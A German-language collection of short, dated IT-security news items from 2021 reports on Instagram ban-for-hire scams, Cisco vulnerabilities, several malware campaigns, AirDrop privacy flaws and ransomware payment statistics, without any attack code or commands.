Die Scammer bieten ihre Dienste in Untergrundforen als Dienstleistung an, wie Motherboard berichtet. Ein Anbieter, der sich selbst War nennt, verlangt 60 US-Dollar pro blockiertem Account - damit gehört er bereits zu den teureren Anbietern. Nach eigenen Angaben verdient War mit diesem "Vollzeit-Job" einen fünfstelligen Betrag pro Monat. 

Erhält War einen Auftrag, ändert er seinen verifizierten Account so ab, dass er genauso aussieht wie das Opfer. Anschliessend meldet er den Opfer-Account wegen Identitätsdiebstahl. Das genüge bereits, um den Account sperren zu lassen. 

Automatische Scripts für Massenmeldungen

Andere Scammer melden den Account des Opfers einfach gehäuft – etwa wegen nicht existierenden Verstössen gegen Instagrams Richtlinien zu Darstellungen von Selbstmord oder Selbstverletzungen. Gemäss dem Bericht werden im Internet mehrere Scripts angeboten, mit denen man bestimmte Accounts immer wieder automatisch melden lassen kann. Die Scripts achten sogar darauf, die Reporting-Limite von Instagram nicht zu überschreiten. 

Die Masche wird sogar noch fieser. Einigen Scammern genügt es nicht, nur an denen zu verdienen, die andere sperren lassen wollen. Sie wollen sich auch an den Opfern bereichern. Nachdem ein Account gesperrt wurde, bieten sie dem Opfer an, den Account wieder herzustellen – sofern das Opfer bis zu 4000 Dollar zahlt. Übrigens: Wer gesperrt wurde, muss neuerdings 24 Stunden warten, bevor er oder sie den Account wiederherstellen kann.

Laut Motherboard untersuche Instagram die Angebotenen Sperr-Services. Das Unternehmen ermutige seine Nutzenden auch, Accounts zu melden, wenn sie ein derartiges Scam-Verhalten vermuten. 

28.06.2021 - 14:42 Uhr

Warum man ASA-Sicherheitslösungen von Cisco sofort patchen sollte

Cyberkriminelle suchen derzeit aktiv nach mehreren Schwachstellen in Ciscos Adaptive-Security-Appliance-Lösung (ASA). Wie das auf Schwachstellen-Management spezialisierte Unternehmen Tenable mitteilt, wird die Sicherheitslücke bereits aktiv ausgenutzt.

Die Sicherheitslücken stecken in der Web-Service-Benutzeroberfläche der ASA- und Firepower-Threat-Defense-Software. Die ASA-Reihe soll Unternehmensnetzwerke schützen und umfasst neben der Software auch Geräte wie etwa Firewalls.

Über die Schwachstellen könne ein nicht authentifizierter Angreifer mittels Phishing-Mails oder schädlichen Links beliebigen Code im Browser der Opfer ausführen, wie Cisco schreibt. Zudem könne der Angreifer auf sensible Daten im Browser zugreifen. Die Schwachstellen werden als CVE-2020-3580, CVE-2020-3581, CVE-2020-3582 und CVE-2020-3583 bezeichnet.

Das Interesse der Cyberkriminellen wurde von einem auf Twitter veröffentlichten Machbarkeitsnachweis entfacht. Dieser zeigt, wie sich die bereits gepatchte Schwachstelle ausnutzen lässt. Der Nachweis wurde vom russischen IT-Security-Anbieter Positive Technologies veröffentlicht. 

Cisco hatte das Problem ursprünglich schon im Oktober 2020 behoben. Wie sich später herausstellte, konnte das Update die Schwachstellen nicht vollständig schliessen. Ende April 2021 veröffentlichte das Unternehmen daher einen weiteren Fix. Administratoren von Unternehmensnetzwerken, die ASA-Geräte nutzen, sollten schleunigst prüfen, ob ihre Systeme auf dem aktuellsten Stand sind und diese falls nötig patchen. 
 

21.06.2021 - 13:34 Uhr

Malware blockiert Torrent-Sites und verpetzt Software-Piraten

Unbekannte versuchen auf die harte Tour zu verhindern, dass Raubkopien von Software verbreitet werden. Zu diesem Zweck entwickelten sie eine Malware, die den Zugang zu häufig genutzten Torrent-Sites blockiert. Darunter etwa "The Pirate Bay", wie Sophos mitteilt. 

Das Schadprogramm ändert lediglich ein paar Einträge in der Windows-Host-Datei mit Verweisen auf die Torrent-Sites. Versuchen die Opfer anschliessend, eine der gelisteten Sites aufzurufen, werden sie stattdessen zum Localhost umgeleitet und können keine Verbindung zur tatsächlichen IP-Adresse der Website herstellen. 

Verbreitet wird der Schädling auf dieselbe Manier, die er stoppen will: über Torrent-Sites. Die Malware gibt sich als populäre Videospiele, Tools und sogar IT-Security-Lösungen aus - beispielweise "Minecraft" und "Left 4 Dead 2". Die Archive enthalten neben der Malware auch funktionslose Readme- und NFO-Dateien sowie Verlinkungen zu den Torrent-Sites, um möglichst authentisch zu wirken. Das Schadprogramm wird zudem auch über Discord verbreitet. 

Motivation des Angreifers unbekannt

Die Malware stiehlt keine Passwörter und verschlüsselt auch keine Dateien. Aber wie gut die Absichten der Entwickler sind, steht noch zur Debatte. Wenn die Malware ausgeführt wird, verbindet sie sich mit einem Remote Host des Angreifers. Der Schädling sendet diesem dann Informationen zu der raubkopierten Software, die das Opfer eigentlich downloaden wollte. 

Webserver zeichnen üblicherweise auch die IP-Adresse der Nutzerinnen und Nutzer auf. Der Angreifer könnte also 1 und 1 zusammenzählen und die Informationen zur raubkopierten Software und der IP-Adresse nutzen. So könnte der Angreifer etwa die Infos mit ISPs, Urheberrechtsagenturen oder den Behörden teilen. Er könnte mit den Infos aber auch die Opfer erpressen. 

Das Schadprogramm wurde von Oktober 2020 bis Januar 2021 aktiv verbreitet, wie Bleepingcomputer berichtet. Danach ging die Website des Angreifers offline. Die infizierten Torrents werden seitdem auch nicht mehr verbreitet - vermutlich, weil die Opfer diese nicht mehr seeden, nachdem sie erkannt haben, dass es sich dabei um eine Täuschung handelt. 

Mehr Details gibt’s auf der Website von Sophos – inklusive einer Anleitung, wie man die Host-Datei manuell wieder säubert. Gemäss dem IT-Security-Anbieter erkennt dessen Lösung den Schädling. 
 

14.06.2021 - 15:28 Uhr

Malware nutzt Steam-Profilbilder, um sich auf Rechnern einzunisten

Gewiefte Cyberkriminelle haben eine neue Methode entdeckt, um ihre Schadprogramme zu verteilen. Dafür nutzen sie Profilbilder auf der populären Gaming-Plattform Steam, wie G Data mitteilt. Das Unternehmen bezeichnet die Methode als Steamhide. 

Die Bilder alleine sind unscheinbar und harmlos – weswegen es für Steam-Betreiber Valve schwierig ist, die schädlichen Bilder zu finden. Auch wenn man eine auf diese Weise manipulierte Datei öffnet, wird der Rechner dadurch nicht infiziert. Denn die Bilder sind nur Trägermedium für schädlichen Code. Dieser muss von einer zweiten Malware ausgelesen, heruntergeladen, entpackt und ausgeführt werden. Der Downloader wird auf konventionelle Art verbreitet – etwa als Anhang einer E-Mail. 

Für Cyberkriminelle bietet diese Methode einige Vorteile. So können sie etwa ihren Schadcode schnell und effektiv bereitstellen. Um eine neue Version einzuspielen, müssten sie nur das Profilbild wechseln. 

Dass Malware in Bildern versteckt wird, ist nichts Neues. Das schreibt auch G Data. Aber dass dafür eine öffentliche Plattform wie Steam genutzt wird, habe G Data nicht zuvor gesehen. Der deutsche IT-Security-Anbieter betont, dass es sich hierbei nicht um einen Bug in der Steam-Plattform handelt. Die Plattform wird lediglich als Downloadserver missbraucht. Auch wenn man keinen Steam-Account habe, könne man sich so ein Schadprogramm einfangen.

Noch in einer Testphase

Laut dem G-Data-Malware-Analysten Karsten Hahn wird diese neue Distribution noch nicht aktiv ausgenutzt. „Die manipulierten Profilbilder sind zwar bereits auf Steam zu finden, die Downloader befinden sich aber noch in einer Testphase“, sagt Hahn. Es sei aber nur eine Frage der Zeit, bis die Malware auch aktiv eingesetzt werde.  

Die ganze Plattform einfach zu blockieren, hätte wohl viele unerwünschte Nebeneffekte schreibt G Data. Nach eigenen Angaben hatte Steam im vergangenen Jahr 120 Millionen aktive Spielerinnen und Spieler pro Monat und 62,6 Millionen pro Tag. Die höchste Anzahl gleichzeitige Nutzer und Nutzerinnen lag 2020 bei 24,8 Millionen.

Trotzdem ist man der Bedrohung nicht hoffnungslos ausgeliefert. Da der Downloader auf konventionelle Weise verbreitet werde, könne man sich weiterhin beispielsweise durch Vorsicht und Skepsis im Umgang mit Dateianhängen schützen.

Abgesehen von ihrer neuartigen Verbreitungsstrategie sei diese Malware nicht bemerkenswert. Mehr Infos und die technischen Details zu Steamhide finden Sie hier.

07.06.2021 - 15:15 Uhr

Telko-Mitarbeitende versagen in der Passwort-Hygiene

Privatpersonen haben kein Händchen für die Passwortwahl. Das ist nichts Neues. Aber diese schlechten Angewohnheiten werden auch auf das Berufsleben übertragen. Dies behauptet Nordpass - Anbieter einer Passwort-Manager-App und Teil der Nord-Security-Familie, zu der etwa auch NordVPN gehört. 

Das Unternehmen analysierte die 10 meistgenutzten Passwörter in der Telekommunikationsindustrie. Die Nummer 1 - wie könnte es auch anders sein – war natürlich "123456", gefolgt von "password" auf Platz 2. 

Die beiden Dauerbrenner in sämtlichen Listen schlechter Passwörter kommen in dieser Aufzählung sogar mehrfach vor - in leichten Variationen. So findet sich auf Platz 4 etwa „password1“, auf Platz 5 "12345678" und "123456789" auf Platz 10.

Die vollständige Liste von Nordpass

  1. 123456
  2. password
  3. cheer!
  4. password1
  5. 12345678
  6. abc123
  7. unknown
  8. Firmenname1*
  9. Firmenname*
  10. 123456789

*Bei diesen Passwörtern handelt es sich um die Namen der Firmen, bei denen die Mitarbeitenden angestellt sind. 

Schwache Passwörter sind potenziell nicht nur für die ganze Firma eine Gefahr. "Unternehmen und ihre Mitarbeitenden sind verpflichtet, die Daten ihrer Kunden zu schützen", sagt Chad Hammond, Sicherheitsexperte bei Nordpass. "Das schwache Passwort eines Mitarbeiters kann möglicherweise das gesamte Unternehmen gefährden, wenn ein Angreifer das gehackte Passwort verwendet, um sich Zugriff auf vertrauliche Informationen zu beschaffen."

Ein gutes Passwort zu setzen, ist aber eigentlich gar nicht so schwierig. Worauf es dabei zu achten gilt, damit die gewählte Losung nicht nur stark, sondern auch sicher ist, erfahren Sie hier.

 

07.06.2021 - 14:51 Uhr

Das Galaktische Imperium hat einfach keine Ahnung von Cybersecurity 

Bis zur dritten Staffel der erfolgreichen Disney+-Serie "The Mandalorian" muss man sich noch etwas gedulden. Die Star-Wars-Serie wird vermutlich erst 2022 fortgesetzt. Dem russischen Cybersecurity-Anbieter Kaspersky dauert das wohl zu lange. Möglicherweise um die Wartezeit zu verkürzen, stellte es sich die Frage, wie gut es um die Cybersecurity des galaktischen Imperiums in dieser weit, weit entfernten Galaxis bestellt ist. 

Kaspersky untersuchte insgesamt vier Vorfälle, die in der Serie gezeigt werden. In einer Folge etwa können die Hauptfigur und seine Mitstreiter ein Raumschiff des Imperiums kapern, weil dessen kritische Systeme ohne jegliche Authentifizierung zugänglich sind. "Diese Leute hätten eine umfassende Schulung zu Sicherheitsbewusstsein gut gebrauchen können", schreibt das Cybersecurity-Unternehmen. 

In einer anderen Folge mussten zwei Labor-Mitarbeiter während einer Evakuierung manuell Daten löschen – damit der Protagonist diese nicht findet. Was natürlich nicht gelingt. Wären die Daten verschlüsselt gewesen, hätten sie sich auf ihren Fluchtplan konzentrieren können. 

In der zweitletzten Folge der zweiten Staffel kommen zwar biometrische Identifizierungssysteme vor. Für den Zugriff auf gewisse Daten ist ein Gesichtsscan erforderlich. Allerdings kann die Hauptfigur ohne Weiteres auf die Informationen zugreifen, obwohl sein Gesicht gar nicht in der Datenbank gespeichert sein dürfte. Das könnte darauf hindeuten, dass dieses System, das sensible Daten schützen soll, im Default-Allow-Modus läuft. 

Das Fazit nach der zweiten Staffel: Die Erben des Galaktischen Imperiums haben dringenden Nachholbedarf! Noch immer. Denn zuvor hatte Kaspersky bereits die Cybersünden des Imperiums durchleuchtet und kam dabei zu einem vergleichbaren Fazit. 

Und was Kaspersky zum Finale der Serie zu sagen hat, lesen Sie auf der Website des Unternehmens.

31.05.2021 - 17:51 Uhr

Cyberkriminelle imitieren andere Geräte dank Bluetooth-Schwachstelle

Die "Bluetooth Special Interest Group" (SIG) warnt vor mehreren Schwachstellen im vielgenutzten Datenübertragungsstandard. Die gemeldeten Schwachstellen betreffen den Pairing-Prozess: Wenn zwei Geräte sich über Bluetooth für den Handshake suchen, könnte ein Angreifer so dazwischen funken. 

Die Man-in-the-Middle-Attacke funktioniert gemäss SIG folgendermassen: Während der Passkey-Authentifizierung kann ein Angreifer mit einer Reihe manipulierter Antworten jedes Bit des zufällig generierten Passkeys bestimmen, der vom Pairing-Initiator in jeder Runde des Prozesses ausgewählt wurde. Sobald der Schlüssel identifiziert wird, kann er genutzt werden, um die authentifizierte Pairing-Prozedur mit dem Responder erfolgreich abzuschliessen. 

Das heisst, das Gerät, das den Pairing-Aufruf eines anderen Geräts akzeptiert, wird stattdessen mit dem Gerät des Angreifers gekoppelt. Der Angreifer muss sich also in Bluetooth-Reichweite der beiden Geräte befinden. Das angreifende Gerät kann sich allerdings nur mit dem Responder unbefugt koppeln, nicht mit dem Initiator des Pairings. 

Informationen dazu, ob die Schwachstellen bereits aktiv ausgenutzt werden, gibt es keine. Erste Patches für das Problem werden demnächst erwartet. Entdeckt wurde das Problem von der Agence nationale de la sécurité des systèmes d’information (ANSSI) – eine für Cybersecurity zuständige französische Behörde.

25.05.2021 - 12:39 Uhr

Malware-Kampagne verschleudert Fake-Ransomware - trotzdem gefährlich

Es wirkt wie eine Ransomware-Attacke: Die eigenen Dateien auf dem Rechner lassen sich nicht mehr öffnen und Cyberkriminelle fordern ein Lösegeld. Aber der Schein trügt. Tatsächlich änderte die Malware STRRAT - keine Ransomware sondern ein Remote-Access-Trojaner (RAT) - lediglich die Dateinamenerweiterung auf ".crimson". Da das Betriebssystem anhand dieser Endung entscheidet, wie eine Datei zu öffnen ist, funktionieren diese Dateien nicht mehr. 

Im Gegensatz zu einer Ransomware werden die Dateien aber nicht verschlüsselt. Der Zugang zu diesen ist also nicht versperrt, sondern lediglich erschwert: Wer die Dateinamenerweiterungen wieder ändert, hat auch seine Daten zurück. Weiss ein Opfer dies allerdings nicht, könnte er oder sie trotzdem auf die Lösegeldforderung eingehen. 

Harmlos ist das Schadprogramm deswegen nicht. Das Täuschungsmanöver soll von der eigentlichen Funktion ablenken: Datendiebstahl. Im Hintergrund zeichnet STRRAT nämlich Tastatureingaben auf und sammelt sensible Informationen wie etwa Zugangsdaten über E-Mail-Clients und Browsern. Zudem können Cyberkriminelle durch den Trojaner aus der Ferne auf infizierte Systeme zugreifen und Befehle ausführen.

 

 

Wie das Microsoft Security Intelligence Team auf Twitter mitteilt, wird das Schadprogramm derzeit in einer massiven Spam-Kampagne verbreitet. Die Mails versuchen, die Empfänger zu überzeugen, auf ein vermeintliches PDF im Anhang zu klicken. Dabei handelt es sich jedoch um manipulierte Bilddateien, die, wenn man sie öffnet, die STRRAT-Malware herunterladen.

Die aktuelle Kampagne verschickt eine weiterentwickelte Version des Schädlings (v1.5). Diese verfüge über neue Verschleierungsfeatures und sei modularer als die Vorgängerversion. Die Kernfunktionen seien jedoch grösstenteils gleich geblieben. 
 

17.05.2021 - 15:13 Uhr

Jedes fünfte Schweizer Unternehmen von Agenttesla betroffen

Das Machtvakuum, das Emotet hinterlassen hat, bleibt umkämpft. Im März hatte sich ein neues Schadprogramm an die Spitze von Check Points "Most Wanted Malware"-Liste gedrängt. 

Schon damals gab es Anzeichen dafür, dass die neue Nummer 1 IcedID die Liste nicht lange anführen wird, wie Sie hier nachlesen können. Und tatsächlich: In der aktuellen Liste kommt der Banking-Trojaner gar nicht mehr vor. 

Neu dominieren die Schädlinge Agenttesla und Dridex. Weltweit waren laut Check Point 15 Prozent der Unternehmen vom Banking-Trojaner Dridex betroffen. An zweiter Stelle folgte der Remote-Access-Trojaner Agenttesla mit knapp 12 Prozent.

Agenttesla in der Schweiz deutlich aktiver

In der Schweiz sieht die Reihenfolge anders aus. Hierzulande lag Agenttesla klar voran: Fast jedes 5. Unternehmen soll im April von der Malware betroffen gewesen sein (19,97 Prozent). Dridex kam hingegen nur auf rund 13 Prozent. 

Agenttesla ist seit 2014 aktiv. Die Software wird laut Check Point sogar öffentlich als legitimes Fernwartungstool verkauft. Eine Lizenz koste zwischen 15 und 59 US-Dollar. Das Schadprogramm kann Tastaturenbefehle aufzeichnen, die Zwischenablage einsehen sowie Screenshots machen und Zugangsdaten stehlen. 

Dridex ist ebenfalls schon länger in den Listen von Check Point zu finden. Der Banking-Trojaner kann auch weitere Malware-Module nachladen. Aus diesem Grund ist Dridex oft die erste Stufe für eine spätere Ransomware-Infektion. 

Die Cyberkriminellen hinter Dridex erpressen ihre Opfer doppelt: Sie verschlüsseln und stehlen sensible Daten von Firmen. Diese müssen dann ein Lösegeld zahlen, um ihre Daten zurückzuerhalten und auch damit die Cyberkriminellen diese Daten nicht veröffentlichen. 

Check Points vollständige "Most Wanted Malware"-Liste für die Schweiz im April

Ein Blick auf die aktuelle Liste von Check Point zeigt, dass Trojaner weiterhin sehr populär sind. Unter den 11 in der Schweiz am verbreitetsten Schädlingen finden sich 7 Trojaner – davon werden 2 als Banking-Trojaner und 4 als RATs eingestuft. 

  1. Agenttesla (RAT): 19,97 Prozent der Schweizer und 11,99 Prozent der globalen Firmen betroffen.
  2. Dridex (Banking-Trojaner): 13,26 Prozent der Schweizer und 15,03 Prozent der globalen Firmen betroffen.
  3. Trickbot (Botnet und Banking-Trojaner): 7,80 Prozent der Schweizer und 8,48 Prozent der globalen Firmen betroffen.
  4. Nanocore (RAT): 3,12 Prozent der Schweizer und 2,10 Prozent der globalen Firmen betroffen.
  5. Dameware (Remote Monitoring): 1,87 Prozent der Schweizer und 0,06 Prozent der globalen Firmen betroffen.
  6. XMRig (Cryptominer): 0,94 Prozent der Schweizer und 3,08 Prozent der globalen Firmen betroffen.
  7. Arkei (Trojan Stealer): 0,94 Prozent der Schweizer und 0,86 Prozent der globalen Firmen betroffen.
  8. Blindingcan (RAT): 0,94 Prozent der Schweizer und 0,44 Prozent der globalen Firmen betroffen.
  9. Lokibot (Infostealer): 0,78 Prozent der Schweizer und 1,25 Prozent der globalen Firmen betroffen.
  10. Netwire (RAT): 0,78 Prozent der Schweizer und 0,42 Prozent der globalen Firmen betroffen.
  11. Phorpiex (Botnet): 0,78 Prozent der Schweizer und 1,38 Prozent der globalen Firmen betroffen.

10.05.2021 - 15:59 Uhr

Cisco warnt vor mehreren kritischen und schweren Sicherheitslücken

Der US-amerikanische Netzwerkausrüster Cisco hat gleich zwei kritische und sieben schwerwiegende Sicherheitslücken geschlossen. Die Schwachstellen betreffen unter anderem die Softwarelösungen Any Connect Mobility Client, Enterprise NFV, Hyperflex HX und SD-WAN vManage. Der Hersteller veröffentlichte bereits entsprechende Patches. 

Kritisch: SD-WAN vManage Software
Laut dem Hersteller würden mehrere Schwachstellen in der SD-WAN-vManage-Software es einem nicht authentifizierten Remote-Angreifer ermöglichen, beliebigen Code auszuführen oder Zugriff auf vertrauliche Informationen sowie Admin-Rechte zu erlangen. 

Die Lücken funktionieren unabhängig voneinander. Das heisst, ein Angreifer muss nicht zwingend alle ausnutzen, um in ein System einzudringen. Gewisse Schwachstellen betreffen allerdings nur Systeme, die in einem Cluster betrieben werden. 

Workarounds gibt es gemäss Cisco nicht.

Kritisch: Hyperflex HX
Auch in der webbasierte Management-Konsole der Hyperflex HX musste Cisco gleich mehrere Schwachstellen beheben. Ein nicht authentifizierter Remote-Angreifer könnte so auf einem betroffenen System beliebigen Code als Root-Benutzer ausführen.

Die Schwachstellen entstehen dadurch, dass die Inputs der Nutzer unzureichend überprüft werden. Auch hier funktionieren die Schwachstellen wieder unabhängig voneinander. Einen Workaround gibt es ebenfalls nicht. 

Schwerwiegend: APs, vDaemon, UCC und weitere
Den Schweregrad der folgenden Schwachstellen stufte Cisco als „hoch“ ein. Entweder, weil das Schadenspotenzial tiefer liegt oder weil sich die Schwachstellen schwieriger ausnutzen lassen. 

  • SD-WAN vManage: Eine Schwachstelle in der webbasierten Messaging-Service-Schnittstelle der Software ermöglicht es einem Angreifer, die Authentifizierung und Autorisierung zu umgehen und die Konfiguration eines betroffenen Systems zu ändern. Dafür muss der Angreifer aber auf ein verbundenes SD-WAN-vEdge-Gerät zugreifen können.
  • Small Business 100, 300, and 500 Series Access Points: Verschiedene Sicherheitslücken in den Geräten können dazu führen, dass ein Angreifer an vertrauliche Informationen gelangt oder beliebigen Code ausführen kann.
  • Enterprise NFV Infrastructure Software: Ein lokaler Angreifer könnte aufgrund einer Schwachstelle auf einem betroffenen Gerät beliebige Befehle auf dem Betriebssystem (OS) mit Root-Rechten ausführen. 
  • SD-WAN Software vDaemon: Wegen inkorrekt gehandhabten Paketen kann ein Angreifer aus der Ferne ein Gerät neu starten. Dies führt zu einem Denial-of-Service-Zustand (DoS).
  • SD-WAN vEdge Software: Mehrere Sicherheitslücken ermöglichen es einem Angreifer,  beliebigen Code als Root-Benutzer auszuführen oder einen Denial-of-Service-Zustand (DoS) auf einem betroffenen Gerät zu verursachen.
  • Unified Communications Manager IM & Presence Service: Ein authentifizierter Remote-Angreifer könnte aufgrund mehrerer Schwachstellen auf einem betroffen System SQL-Injection-Angriffe lancieren.
  • AnyConnect Secure Mobility Client: Die Installations-, Deinstallations- und Upgrade-Prozesse enthalten gleich mehrere Schwachstellen. Nutzt ein authentifizierter, lokaler Angreifer diese aus, kann er beliebigen Code auf einem betroffenen Gerät mit System-Rechten ausführen. Dafür muss der Angreifer jedoch über gültige Anmeldeinformationen auf dem Windows-System verfügen.

03.05.2021 - 15:45 Uhr

Mysteriöse Linux-Malware fliegt seit Jahren unter dem Radar

Die Malware Rotajakiro hat es geschafft, jahrelang unentdeckt zu operieren – und tut dies grösstenteils noch immer. Das Schadprogramm wurde entwickelt, um Linux-Systeme zu infiltrieren und dabei möglichst keinen Mucks zu machen. 

Um unentdeckt zu bleiben, verschlüsselt das Schadprogramm etwa sämtliche Kommunikationskanäle, wie Qihoo 360s Network Security Research Lab (360 Netlab) mitteilt. Dafür nutzt die Malware etwa ZLIB-Komprimierung sowie die AES-, XOR-, ROTATE-Verschlüsselung. 

Lesen Sie hier mehr zum Thema Verschlüsselung. Von der Skytale bis zur Post-Quanten-Kryptografie: Wie Gaius Iulius Caesar, die Spartaner, Freimaurer und Co. früher versuchten, ihre Geheimnisse geheim zu behalten und warum das nicht nur für Historiker, sondern auch für die moderne Kryptografie interessant ist.

Rotajakiro ist schon seit Jahren aktiv. Gemäss 360 Netlab wurden die ersten Proben bereits 2018 auf Virustotal geladen. Seitdem wurden 3 weitere Varianten des Schädlings hinzugefügt. Als Netalb darüber schrieb, lag die Erkennungsrate aller 4 Proben bei 0! 

Unterdessen haben die Anbieter von Antivirenlösungen zwar aufgerüstet. Über die Hälfte der auf Virustotal geprüften Engines könnten die Proben allerdings noch immer nicht als Malware identifizieren. 

Die vier Proben aus Virustotal:

Die Malware funktioniere als Backdoor in einem infizierten System. Ein Angreifer könne so Systeminformationen und auch sensible Daten auslesen und entwenden. Zudem ermögliche es der Schädling auch, Plugins und Daten zu verwalten sowie auf 64-Bit-Linux-Geräten auch verschiedene Plugins auszuführen. 

Die wahre Absicht hinter der Malware bleibe aber ein Mysterium. Der Schädling verfüge über 12 Funktionen, schreibt Netlab 360. Drei davon hängen mit dem Ausführungen bestimmter Plugins zusammen. „Leider haben wir keinen Einblick in die Plugins und kennen daher ihren wahren Zweck nicht“, schreibt das Unternehmen.

Die Sicherheitsforscher konnten jedoch einen Zusammenhang mit dem Torii-IoT-Botnet ausmachen. So nutzen die beiden Schadprogramme etwa dieselben Kommandos. 
 

27.04.2021 - 18:13 Uhr

Apple hockt seit 2019 auf einer AirDrop-Schwachstelle

Ein Team von Sicherheitsforschern der Technischen Universität Darmstadt hat gleich zwei Schwachstellen in Apples AirDrop gefunden – dem adhoc Filesharing-Dienst des Herstellers. Aufgrund dessen könnten Unbefugte die Kontaktinformationen (Telefonnummern und E-Mail-Adressen) der Apple-User auslesen, während sie AirDrop nutzen, wie "The Register" berichtet.

Die Forscher informierten den US-amerikanischen Hersteller sofort. Das war allerdings bereits im Mai 2019. Behoben wurde die Schwachstelle bisher noch nicht, obwohl Apple damals sagte, sie würden sich dem Problem annehmen. 

Die Lösung

Vergangenen Juli hiess es seitens des Herstellers noch, dass es keine Updates oder Anpassungen gäbe, um die Schwachstellen zu schliessen. Dafür hatte das Team aus Darmstadt gerade mal drei Monate später eine Lösung für das Problem. Wie diese funktioniert, wird im Paper "PrivateDrop: Practical Privacy-Preserving Authentication for Apple AirDrop" (PDF) erklärt. 

Die Lösung wurde zwar auch auf Github veröffentlicht. Trotzdem muss man weiter auf Apple warten. Denn ein durchschnittlicher User könne die Lösung nicht implementieren, heisst es im Bericht. Sie muss im Betriebssystem integriert werden. 

Warum Apple nicht sputet? "The Register" beschreibt die Schwachstellen als „esoterisch“ aufgrund der Schwierigkeit, diese auszunutzen. Aber: Die Sicherheitsforscher der Technischen Universität Darmstadt stuften sie trotzdem als „schwerwiegend“ ein – wohl aufgrund der Tatsache, dass es sich um personenbezogene Daten handelt, die potenziell gestohlen werden könnten. 

Das Problem

Apple setzt bei AirDrop auf eine TLS-verschlüsselte Peer-to-Peer-WLAN-Verbindung zwischen zwei Apple-Geräten. Um eine Verbindung aufzubauen, sendet das Gerät einen Hash-Code mit einem digitalen Fingerabdruck. 

Für die Verschlüsselung nutzt Apple den 20-jährigen SHA-256-Algorithmus. Dieser lässt sich gemäss den Sicherheitsforschern innert Millisekunden knacken. Die Verschlüsselung der E-Mail-Adresse sei zwar etwas schwieriger zu knacken. Allerdings könnte man etwa Datenbanken mit entwendeten E-Mail-Adressen verwenden, um diese Hash-Codes ebenfalls relativ schnell zu entwirren.

Mehr zum Thema Verschlüsselungen lesen Sie hier im Hintergrundbericht. Dieser zeigt unter anderem auf, wie die modernen Methoden funktionieren und warum auch die antiken Verfahren noch immer interessant sind für die heutige Informatik. 

19.04.2021 - 13:15 Uhr

Hacker bereichern sich an der Gier anderer Hacker

Der tschechische Cybersecurity-Anbieter Avast warnt vor der Anschaffung von Hacking-Tools. Jedenfalls, wenn man diese auf dubiosem Weg beschaffen will. Auf Telegram werden nämlich derzeit kostenlose Tools angeboten. Diese könnten angeblich für Brute-Force-Attacken auf Konten von Banken-, Dating- und Social-Media-Plattformen genutzt werden. 

Die angeblichen Hacking-Tools kommen in einer Zip-Datei daher. Darin ist eine ausführbare Datei, die eine simple Benutzeroberfläche startet. Sobald man auf einen Button klickt – ganz egal welcher – installiert das Tool eine Malware auf dem Rechner der knausrigen Hacker in spe. 

Das Schadprogramm stiehlt anschliessend die Kryptowährungen der Opfer – mit einem sehr simplen Trick. Die Malware prüft, ob in der Zwischenablage Wallet-Adressen gespeichert sind. Wenn auf dem Rechner eine Zahlung mit Kryptowährungen ausgeführt wird, ersetzt die Malware so einfach die Empfänger-Adresse mit derjenigen des Angreifers. Sofern das Opfer die hineinkopierte Adresse nicht überprüft, fällt diese simple Taktik nicht auf. 

Der Schädling ist zudem hartnäckig und läuft auch dann noch weiter, wenn das Opfer die unnütze Benutzeroberfläche schliesst. Die Malware kann zudem auch als geplanter Task immer wieder neu gestartet werden. 

Avast nannte die Malware Hackboss. Gemäss dem Cybersecurity-Anbieter haben die Cyberkriminellen, die dahinter stecken, bereits 560'000 US-Dollar auf ihren über 100 Wallets gesammelt. Allerdings sei das Geld nicht ausschliesslich dieser einen Masche zuzuschreiben.

14.04.2021 - 14:07 Uhr

Fake-Portemonnaie im Chrome-Browser stiehlt Kryptowährungen

Die Kantonspolizei Zürich warnt vor einer bösartigen Erweiterung des Chrome Browsers. Dabei handle es sich angeblich um eine Browser-Erweiterung von Walletconnect. Nutzer und Nutzerinnen könnten damit einfacher und sicherer per Handy auf webbasierte Kryptowährungskonten zugreifen.

Tatsächlich hat diese Erweiterung es aber auf die Zugangsdaten der Opfer zu ihren Konten abgesehen, wie die Kantonspolizei schreibt. Mit den Zugangsdaten könnten die Betrüger hinter der Täuschung anschliessend die Kryptogelder der Opfer auf ihre eigenen Konten überweisen. Insgesamt sollen die Gauner bereits rund 100'000 Franken in Kryptowährungen gestohlen haben. 

Screenshot der bösartigen Chrome-Erweiterung im Webstore. (Source: Kantonspolizei Zürich)

Screenshot der bösartigen Chrome-Erweiterung im Webstore. (Source: Kantonspolizei Zürich)

Walletconnect ist ein Open-Source-Protokoll, das es ermöglicht, dezentralisierte Applikationen mit mobilen Krypto-Wallets zu verbinden. Dies geschieht dabei über einen QR-Code. Auf der Website des Anbieters aus Zug steht ironischerweise, dass Walletconnect eine sicherere Alternative zu Desktop- oder Browser-Extension-Wallets sei. 

Google wurde zwar bereits gebeten, die gefälschte Chrome-Erweiterung zu entfernen, wie die Kantonspolizei schreibt. Zum Zeitpunkt der Publikation dieses Beitrags ist die Erweiterung jedoch noch immer im offiziellen Webstore von Google zu finden. 

Die Kantonspolizei rät, die Erweiterung nicht herunterzuladen und nicht zu installieren. Ist man bereits betroffen, soll man Anzeige erstatten bei der örtlichen Polizeistation.

12.04.2021 - 15:35 Uhr

Über die Hälfte zahlt Lösegeld nach Ransomware-Angriff

Unser Leben wird zunehmend digitaler - dadurch wird es auch zunehmend verwundbarer etwa durch Cyberattacken. Eine Ransomware beispielsweise ist ein Schadprogramm, das sämtliche Dateien auf einem Rechner verschlüsselt. Anschliessend verlangen die Cyberkriminellen ein Lösegeld mit dem Versprechen, die Daten bei Zahlung wieder freizugeben.

Für Firmen ist dies ein grosses Problem. Aber auch auf einem privaten Rechner kann der mögliche Verlust etwa von Familienfotos schmerzhaft werden. Obwohl IT-Security-Anbieter stets empfehlen, man solle die Lösegelder nicht zahlen, ist die Bereitschaft dazu hoch, wie eine Studie von Kaspersky zeigt. 

Im weltweiten Durchschnitt würden 56 Prozent der Betroffenen das geforderte Lösegeld zahlen. Dieser Anteil  variiere jedoch stark zwischen den Altersgruppen. Bei den 35- bis 44-Jährigen liegt er bei 65 Prozent. Personen über 55 zahlen hingegen deutlich seltener: Hier liegt der Anteil gemäss Kaspersky bei lediglich 11 Prozent. 

Weshalb man nicht zahlen sollte

"Unsere Zahlen zeigen in den vergangenen zwölf Monaten einen signifikanten Anstieg bei der Bereitschaft privater Nutzer, Lösegeldzahlungen zu leisten", sagt Marina Titova, Head of Consumer Product Marketing bei Kaspersky.

